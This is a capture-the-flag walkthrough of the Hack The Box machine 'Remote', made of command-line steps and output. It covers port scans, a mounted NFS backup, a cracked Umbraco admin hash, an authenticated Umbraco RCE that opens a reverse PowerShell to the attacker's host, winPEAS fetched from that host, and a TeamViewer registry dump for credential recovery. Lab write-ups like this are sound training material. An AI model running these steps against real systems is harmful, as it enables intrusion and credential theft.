Remote
Contents
Port scan
u505@naos:~/HTB/Machines/Remote$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.180
Starting masscan 1.0.5 at 2020-12-30 21:48:54 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 111/tcp on 10.10.10.180 Discovered open port 49667/tcp on 10.10.10.180 Discovered open port 49666/tcp on 10.10.10.180 Discovered open port 2049/tcp on 10.10.10.180 Discovered open port 49680/tcp on 10.10.10.180 Discovered open port 49679/tcp on 10.10.10.180 Discovered open port 445/tcp on 10.10.10.180 Discovered open port 21/tcp on 10.10.10.180 Discovered open port 135/tcp on 10.10.10.180 Discovered open port 49678/tcp on 10.10.10.180 Discovered open port 49664/tcp on 10.10.10.180 Discovered open port 80/tcp on 10.10.10.180 Discovered open port 49665/tcp on 10.10.10.180 Discovered open port 5985/tcp on 10.10.10.180 Discovered open port 139/tcp on 10.10.10.180 Discovered open port 47001/tcp on 10.10.10.180
u505@naos:~/HTB/Machines/Remote$ nmap -sC -sV remote Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 16:49 EST Nmap scan report for remote (10.10.10.180) Host is up (0.037s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Home - Acme Widgets 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: 8m06s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-30T21:58:02 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 81.95 seconds
u505@naos:~/HTB/Machines/Remote$ nmap -p 5985 -sC -sV remote Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 16:52 EST Nmap scan report for remote (10.10.10.180) Host is up (0.037s latency).
PORT STATE SERVICE VERSION 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.46 seconds
Ftp enum
u505@naos:~/HTB/Machines/Remote$ ftp remote Connected to remote. 220 Microsoft FTP Service Name (remote:u505): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. ftp> put userlist local: userlist remote: userlist 200 PORT command successful. 550 Access is denied. ftp> quit 221 Goodbye.
Anonymous ftp access, but no files and upload denied.
Web Enumeration
We find a product Umbraco
Search exploit
u505@naos:~/HTB/Machines/Remote$ searchsploit umbraco
------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
Possibly the exploit 46153 is a good fit, but needs authentication.
Dirsearch
Dirsearch finds the reference to Umbraco too.
u505@naos:~/HTB/Machines/Remote$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,html,htm,aspx,config,js" -f -t 1000 -u http://10.10.10.180
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, html, htm, aspx, config, js | HTTP method: GET | Threads: 1000 | Wordlist size: 1764160
Error Log: /opt/utils/dirsearch/logs/errors-20-12-31_08-19-34.log
Target: http://10.10.10.180/
Output File: /opt/utils/dirsearch/reports/10.10.10.180/_20-12-31_08-19-35.txt
[08:19:35] Starting: [08:19:35] 200 - 2KB - /blog.aspx [08:19:36] 200 - 3KB - /contact/ [08:19:36] 200 - 2KB - /products/ [08:19:36] 200 - 2KB - /home [08:19:36] 200 - 2KB - /default.aspx [08:19:36] 200 - 2KB - /home/ [08:19:36] 200 - 3KB - /contact [08:19:36] 200 - 2KB - /products [08:19:36] 200 - 2KB - /blog [08:19:36] 200 - 2KB - /blog/ [08:19:36] 200 - 2KB - /products.aspx [08:19:36] 200 - 3KB - /contact.aspx [08:19:37] 200 - 2KB - /home.aspx [08:19:37] 500 - 3KB - /product.aspx [08:19:37] 200 - 2KB - /people [08:19:37] 200 - 2KB - /people/ [08:19:37] 200 - 2KB - /people.aspx [08:19:37] 500 - 3KB - /product [08:19:37] 500 - 3KB - /product/ [08:19:37] 200 - 2KB - /Default.aspx [08:19:41] 200 - 2KB - /Home [08:19:41] 200 - 2KB - /Home.aspx [08:19:46] 200 - 2KB - /Home/ [08:19:52] 200 - 2KB - /Products.aspx [08:19:52] 200 - 2KB - /Products/ [08:19:52] 200 - 2KB - /Products [08:19:58] 200 - 3KB - /Contact.aspx [08:19:58] 200 - 3KB - /Contact/ [08:19:58] 200 - 3KB - /Contact [08:20:04] 302 - 126B - /install/ -> /umbraco/ [08:20:05] 302 - 126B - /install -> /umbraco/ [08:20:23] 200 - 2KB - /Blog.aspx [08:20:23] 200 - 2KB - /Blog/ [08:20:23] 200 - 2KB - /Blog [08:20:28] 200 - 2KB - /about-us/ [08:20:28] 200 - 2KB - /about-us [08:20:28] 200 - 2KB - /about-us.aspx [08:20:42] 200 - 2KB - /People/ [08:20:42] 200 - 2KB - /People.aspx [08:20:42] 200 - 2KB - /People [08:21:09] 500 - 3KB - /Product [08:21:09] 500 - 3KB - /Product/ [08:21:10] 500 - 3KB - /Product.aspx [08:21:18] 400 - 11B - /base/ [08:21:47] 302 - 126B - /INSTALL -> /umbraco/ [08:21:47] 302 - 126B - /INSTALL/ -> /umbraco/ [08:21:58] 500 - 3KB - /master [08:21:58] 500 - 3KB - /master.aspx [08:21:58] 200 - 2KB - /1112/ [08:21:58] 200 - 2KB - /1112.aspx ...
AD enum
Without a user, useless information.
u505@naos:~/HTB/Machines/Remote$ crackmapexec smb 10.10.10.180/32 SMB 10.10.10.180 445 REMOTE [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
u505@naos:~/HTB/Machines/Remote$ crackmapexec winrm 10.10.10.180/32 WINRM 10.10.10.180 5985 NONE [*] None (name:10.10.10.180) (domain:None) WINRM 10.10.10.180 5985 NONE [*] http://10.10.10.180:5985/wsman
u505@naos:~/HTB/Machines/Remote$ crackmapexec smb 10.10.10.180/32 --rid-brute SMB 10.10.10.180 445 REMOTE [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False) SMB 10.10.10.180 445 REMOTE [-] Error creating DCERPC connection: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
NFS enum
Nmap listed an nfs resource. Let list exported folders.
u505@naos:~/HTB/Machines/Remote$ nmap -p 2049 -sV --script=nfs-showmount remote Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 08:38 EST Nmap scan report for remote (10.10.10.180) Host is up (0.038s latency).
PORT STATE SERVICE VERSION 2049/tcp open mountd 1-3 (RPC #100005) | nfs-showmount: |_ /site_backups
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds
Mount the export.
u505@naos:~/HTB/Machines/Remote$ mkdir nfs u505@naos:~/HTB/Machines/Remote$ sudo mount -t nfs remote:/site_backups nfs u505@naos:~/HTB/Machines/Remote$ df -h nfs Filesystem Size Used Avail Use% Mounted on remote:/site_backups 30G 12G 19G 40% /opt/HTB/Machines/Remote/nfs
u505@naos:~/HTB/Machines/Remote$ cd nfs u505@naos:~/HTB/Machines/Remote/nfs$ ls -ltr total 115 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx -rwx------ 1 nobody 4294967294 28539 Feb 20 2020 Web.config drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Plugins drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client drwx------ 2 nobody 4294967294 49152 Feb 20 2020 bin drwx------ 2 nobody 4294967294 64 Feb 20 2020 css drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Config drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Media drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Umbraco drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Umbraco_Client drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Views drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Data
User enumeration
After a long search, the folder App_Data contains usefull information. On the logs, there are success Logins with user admin@htb.local
u505@naos:~/HTB/Machines/Remote/nfs/App_Data/Logs$ grep "Login attempt" UmbracoTraceLog.remote.txt
2020-02-20 02:38:18,746 [P4392/D2/T10] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
2020-02-20 02:38:57,527 [P4392/D2/T30] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.137
An other interresting file is Umbraco.sdf, witch is the database of the CMS. SDF files contain compact database saved in the SQL Server Compact (SQL CE) format.
u505@naos:~/HTB/Machines/Remote/nfs/App_Data$ ls -ltr
total 1969
-rwx------ 1 nobody 4294967294 1965978 Feb 20 2020 Umbraco.sdf
-rwx------ 1 nobody 4294967294 36832 Feb 20 2020 umbraco.config
drwx------ 2 nobody 4294967294 64 Feb 20 2020 cache
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Logs
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Models
drwx------ 2 nobody 4294967294 64 Feb 20 2020 packages
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 TEMP
We copy the database.
u505@naos:~/HTB/Machines/Remote/nfs/App_Data$ cp Umbraco.sdf ../../
I didn't find an easy way to view the file content, so I tried string. There is an hash SHA1 for the user admin@htb.local.
u505@naos:~/HTB/Machines/Remote/nfs/App_Data$ cd ../../
u505@naos:~/HTB/Machines/Remote$ strings Umbraco.sdf | head -n 15
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
@{pv
qpkaj
dAc0^A\pW
(1&a$
"q!Q
umbracoDomains
domainDefaultLanguage
Crack password
u505@naos:~/HTB/Machines/Remote$ hashcat --example-hashes | grep -A1 -B 2 SHA1 | head -n 10
MODE: 100 TYPE: SHA1 HASH: b89eaac7e61417341b710b727768294d0e6a277b --
MODE: 150 TYPE: HMAC-SHA1 (key = $pass) HASH: 02b256705348a28b1d6c0f063907979f7e0c82f8:10323 --
We store the hash in a file.
u505@naos:~/HTB/Machines/Remote$ cat hash_admin@htb.local b8be16afba8c314ad33d812f22a04991b90e2aaa
We run hashcat.
u505@naos:~/HTB/Machines/Remote$ hashcat -m 100 hash_admin@htb.local /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v6.1.1) starting... ... b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
Session..........: hashcat Status...........: Cracked Hash.Name........: SHA1 Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa Time.Started.....: Wed Dec 30 18:22:57 2020 (1 sec) Time.Estimated...: Wed Dec 30 18:22:58 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 7962.8 kH/s (5.96ms) @ Accel:1024 Loops:1 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 9830400/14344384 (68.53%) Rejected.........: 0/9830400 (0.00%) Restore.Point....: 9502720/14344384 (66.25%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: bounty11 -> babypolk07 Hardware.Mon.#1..: Temp: 39c Util: 47% Core:1032MHz Mem:2505MHz Bus:16
Started: Wed Dec 30 18:22:54 2020 Stopped: Wed Dec 30 18:22:59 2020
We find the password.
u505@naos:~/HTB/Machines/Remote$ hashcat -m 100 hash_admin@htb.local /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
CMS and remote command execution RCE
Access CMS
With the credentials, we access the CMS Umbraco
As expected, the version is the vulnerable version.
RCE
u505@naos:~/HTB/Machines/Remote$ searchsploit Umbraco ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results u505@naos:~/HTB/Machines/Remote$ searchsploit -m 46153 Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution URL: https://www.exploit-db.com/exploits/46153 Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Remote/46153.py
This PoC opens a Calc remotely in the target. This version of the same vulnerability allows to specify the command on the command line.
u505@naos:~/HTB/Machines/Remote$ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py --2020-12-30 18:35:55-- https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 3202 (3.1K) [text/plain] Saving to: ‘exploit.py’
exploit.py 100%[========================================================================================================================================>] 3.13K --.-KB/s in 0s
2020-12-30 18:35:55 (17.2 MB/s) - ‘exploit.py’ saved [3202/3202]
Execute ipconfig to see the IP.
u505@naos:~/HTB/Machines/Remote$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote' -c ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::5db8:182f:c853:f34d Link-local IPv6 Address . . . . . : fe80::5db8:182f:c853:f34d%13 IPv4 Address. . . . . . . . . . . : 10.10.10.180 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7900%13 10.10.10.2
And execute the whoami command.
u505@naos:~/HTB/Machines/Remote$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote' -c whoami iis apppool\defaultapppool
Finally, this version of the same vulnerability opens a reverse powershell.
u505@naos:~/HTB/Machines/Remote$ wget https://raw.githubusercontent.com/Jonoans/Umbraco-RCE/master/exploit.py --2020-12-30 18:41:03-- https://raw.githubusercontent.com/Jonoans/Umbraco-RCE/master/exploit.py Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 3950 (3.9K) [text/plain] Saving to: ‘exploit.py.1’
exploit.py.1 100%[========================================================================================================================================>] 3.86K --.-KB/s in 0.02s
2020-12-30 18:41:03 (165 KB/s) - ‘exploit.py.1’ saved [3950/3950]
u505@naos:~/HTB/Machines/Remote$ mv exploit.py.1 exploit_2.py u505@naos:~/HTB/Machines/Remote$ wget https://raw.githubusercontent.com/Jonoans/Umbraco-RCE/master/exploit.cs --2020-12-30 18:43:34-- https://raw.githubusercontent.com/Jonoans/Umbraco-RCE/master/exploit.cs Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 1850 (1.8K) [text/plain] Saving to: ‘exploit.cs’
exploit.cs 100%[========================================================================================================================================>] 1.81K --.-KB/s in 0s
2020-12-30 18:43:35 (14.3 MB/s) - ‘exploit.cs’ saved [1850/1850]
Magically, the reverse shell is opened.
u505@naos:~/HTB/Machines/Remote$ python3 exploit_2.py -u admin@htb.local -p baconandcheese -w 'http://remote' -i 10.10.14.12 [+] Trying to bind to :: on port 4444: Done [+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49915 [+] Trying to bind to :: on port 4445: Done [+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49916 [*] Switching to interactive mode PS C:\windows\system32\inetsrv> whoami iis apppool\defaultapppool
User flag
PS C:\Users\Public> cat user.txt <USER_FLAG>
Enumeration of the target
winPEAS
u505@naos:~/HTB/Machines/Remote$ mkdir web u505@naos:~/HTB/Machines/Remote$ cd web/ u505@naos:~/HTB/Machines/Remote/web$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe ./ u505@naos:~/HTB/Machines/Remote/web$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
Once the web server is ready, we download the file.
PS C:\Users\Public> Invoke-WebRequest -Uri "http://10.10.14.12/winPEAS.exe" -OutFile "winPEAS.exe"
PS C:\Users\Public> .\winPEAS.exe ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD Creating Dynamic lists, this could take a while, please wait... - Checking if domain... - Getting Win32_UserAccount info... ... [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson) OS Build Number: 17763 [!] CVE-2019-0836 : VULNERABLE [>] https://exploit-db.com/exploits/46718 [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
[!] CVE-2019-0841 : VULNERABLE [>] https://github.com/rogue-kdc/CVE-2019-0841 [>] https://rastamouse.me/tags/cve-2019-0841/
[!] CVE-2019-1064 : VULNERABLE [>] https://www.rythmstick.net/posts/cve-2019-1064/
[!] CVE-2019-1130 : VULNERABLE [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
[!] CVE-2019-1253 : VULNERABLE [>] https://github.com/padovah4ck/CVE-2019-1253
[!] CVE-2019-1315 : VULNERABLE [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html
[!] CVE-2019-1385 : VULNERABLE [>] https://www.youtube.com/watch?v=K6gHnr-VkAg
[!] CVE-2019-1388 : VULNERABLE [>] https://github.com/jas502n/CVE-2019-1388
[!] CVE-2019-1405 : VULNERABLE [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
Finished. Found 9 potential vulnerabilities. ... [+] Looking for AutoLogon credentials Some AutoLogon credentials were found!! DefaultUserName : Administrator ... [+] Interesting Services -non Microsoft- [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ssh-agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Disabled - Stopped Agent to hold private keys used for public key authentication. =================================================================================================
TeamViewer7(TeamViewer GmbH - TeamViewer 7)["C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"] - Auto - Running TeamViewer Remote Software =================================================================================================
VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running Alias Manager and Ticket Service =================================================================================================
VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - Running Provides support for synchronizing objects between the host and guest operating systems. =================================================================================================
VMware Physical Disk Helper Service(VMware, Inc. - VMware Physical Disk Helper Service)["C:\Program Files\VMware\VMware Tools\vmacthlp.exe"] - Auto - Running Enables support for running virtual machines from a physical disk partition =================================================================================================
VMwareCAFCommAmqpListener(VMware CAF AMQP Communication Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\CommAmqpListener.exe"] - Manual - Stopped VMware Common Agent AMQP Communication Service =================================================================================================
VMwareCAFManagementAgentHost(VMware CAF Management Agent Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\ManagementAgentHost.exe"] - Manual - Stopped VMware Common Agent Management Agent Service ================================================================================================= ...
Teamviewer
PS C:\Users\Public> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 120 8 6428 10560 0.02 2168 0 conhost 474 18 2332 5232 404 0 csrss 162 13 1664 4476 488 1 csrss 260 14 4084 13360 4204 0 dllhost 531 21 14848 32812 560 1 dwm 49 6 1592 3996 812 0 fontdrvhost 49 6 1624 4076 976 1 fontdrvhost 0 0 56 8 0 0 Idle 198 16 8688 17296 2844 0 inetinfo 472 26 11280 41912 5340 1 LogonUI 929 23 5812 14324 648 0 lsass 227 13 3052 10140 4432 0 msdtc 601 65 119892 107172 3056 0 MsMpEng 119 26 1940 5240 3224 0 nfssvc 725 34 97168 112492 4.97 5764 0 powershell 0 11 264 24360 104 0 Registry 614 35 16852 20020 5292 0 SearchIndexer 526 10 5228 9612 592 0 services 53 3 516 1224 304 0 smss 473 23 5876 16104 2720 0 spoolsv 256 13 5068 11416 72 0 svchost 226 12 2620 11972 132 0 svchost ... 193 15 6148 10188 6092 0 svchost 1477 0 192 140 4 0 System 1007 23 5492 19184 2912 0 TeamViewer_Service 178 12 3192 10032 2964 0 VGAuthService 122 8 1564 6092 1420 0 vmacthlp 300 20 4996 17980 2932 0 vmtoolsd 1767 164 572532 417848 2,490.97 5108 0 w3wp 163 14 4940 12096 0.03 112 0 win32calc 175 11 1508 6560 480 0 wininit 254 12 2840 13788 584 1 winlogon 367 16 9332 18884 4792 0 WmiPrvSE
PS C:\Users\Public> tasklist /V /FI "PID eq 2912"
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title ========================= ======== ================ =========== ============ =============== ================================================== ============ =============== TeamViewer_Service.exe 2912 0 22,588 K Unknown N/A 0:00:11 N/A
The Teamviewer version 7 is old.
PS C:\Program Files (x86)\TeamViewer> dir
Directory: C:\Program Files (x86)\TeamViewer
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/27/2020 10:35 AM Version7
The article of whynotsecurity explains that Teamviewer (upto version 14) stores system credentials in windows registry. Password is encrypted with AES. Using Reverse engineering, whynotsecurity found the key and the initialization vector used by Teamviewer.
PS C:\Program Files (x86)\TeamViewer\Version7> reg query HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7 StartMenuGroup REG_SZ TeamViewer 7 InstallationDate REG_SZ 2020-02-20 InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7 Always_Online REG_DWORD 0x1 Security_ActivateDirectIn REG_DWORD 0x0 Version REG_SZ 7.0.43148 ClientIC REG_DWORD 0x11f25831 PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516 SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C096311087